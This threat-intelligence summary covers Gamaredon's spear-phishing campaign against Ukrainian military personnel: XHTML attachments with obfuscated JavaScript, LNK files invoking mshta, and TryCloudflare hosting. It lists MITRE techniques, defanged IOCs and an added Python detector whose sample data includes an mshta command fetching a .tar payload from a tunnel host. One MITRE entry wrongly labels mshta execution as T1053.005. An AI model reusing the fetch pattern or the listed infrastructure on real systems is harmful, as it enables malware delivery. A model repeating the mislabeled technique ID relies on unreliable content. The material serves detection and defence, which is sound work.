“Gamaredon’s Ongoing Spear-Phishing Assault on Ukraine’s Military”

CRIL identifies an active Gamaredon spear-phishing campaign targeting Ukrainian military personnel, delivering malicious XHTML attachments that run obfuscated JavaScript to download payloads and leveraging TryCloudflare for anonymous hosting and evasion. The operation appears large-scale and ongoing, with victim interaction tracking via a 1-pixel image. #Gamaredon #TryCloudflare

Key Points

  • Target: Ukrainian military personnel.
  • Method: Spear-phishing emails with malicious XHTML attachments.
  • Execution: Obfuscated JavaScript code downloads a malicious archive.
  • Malicious Payload: A Windows shortcut (LNK) file that invokes a remote .tar archive via mshta.
  • Hosting: Uses TryCloudflare’s one-time tunnel for anonymous file hosting.
  • Tracking: A 1-pixel remote image monitors victim interactions.
  • Campaign Scope: Large-scale and coordinated phishing efforts against Ukrainian entities; ongoing activity observed since August 2024.
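The mshta stage of the chain described above (a shortcut handing mshta a remote archive URL on a TryCloudflare tunnel) is the step defenders can most readily spot in endpoint telemetry. The following is an added example, not code from the CRIL post; it assumes Sysmon-style process-creation fields (Image, CommandLine, ParentImage), and the events and tunnel hostname are constructed:

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style process-creation events (sample input, not real telemetry).
SAMPLE_EVENTS = [
    {   # Matches the chain on this page: mshta pulling a .tar from a TryCloudflare tunnel.
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" https://lorem-ipsum-dolor-amet.trycloudflare.com/x/y/payload.tar',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # Benign-looking: mshta running a local .hta shipped with an installer.
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # Unrelated process; a URL on the command line is only interesting when mshta gets it.
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" https://example.org/',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
ARCHIVE_EXTENSIONS = (".tar", ".rar")   # the archive types named on this page


def assess_event(event):
    """Return the reasons an event looks like the mshta stage of this campaign ([] if none)."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return []
    reasons = []
    for url in URL_RE.findall(event.get("CommandLine", "")):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        path = parsed.path.lower()
        reasons.append("mshta launched with a remote URL: " + host)
        if host.endswith(".trycloudflare.com"):
            reasons.append("host is a TryCloudflare quick tunnel")
        if path.endswith(ARCHIVE_EXTENSIONS):
            reasons.append("remote target has an archive extension (" + path.rsplit(".", 1)[-1] + ")")
    return reasons


def scan(events):
    """Return (event index, reasons) for every event that produced at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := assess_event(e))]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}:", "; ".join(reasons))
```

A local .hta launched by mshta produces no finding, so the rule keys on the remote fetch rather than on mshta itself; the TryCloudflare and archive checks add severity on top of that.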

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Emails sent to Ukrainian military personnel carry malicious XHTML attachments.
  • [T1204.002] User Execution: Malicious File – The victim opens the XHTML attachment, whose embedded JavaScript downloads the archive containing the LNK file.
  • [T1053.005] Signed Binary Proxy Execution: Mshta – The LNK file invokes mshta to fetch and run a remote .tar archive hosted on a TryCloudflare tunnel.
  • [T1027] Obfuscated Files or Information – The JavaScript inside the XHTML attachment is obfuscated to hinder analysis and detection.

Indicators of Compromise

  • [SHA256] XHTML payload hashes – 0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b, 12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49, and 2 other hashes
  • [URL] Malicious URL – hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar, hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar, and 2 more URLs

Read more: https://cyble.com/blog/gamaredons-spear-phishing-assault-on-ukraines-military/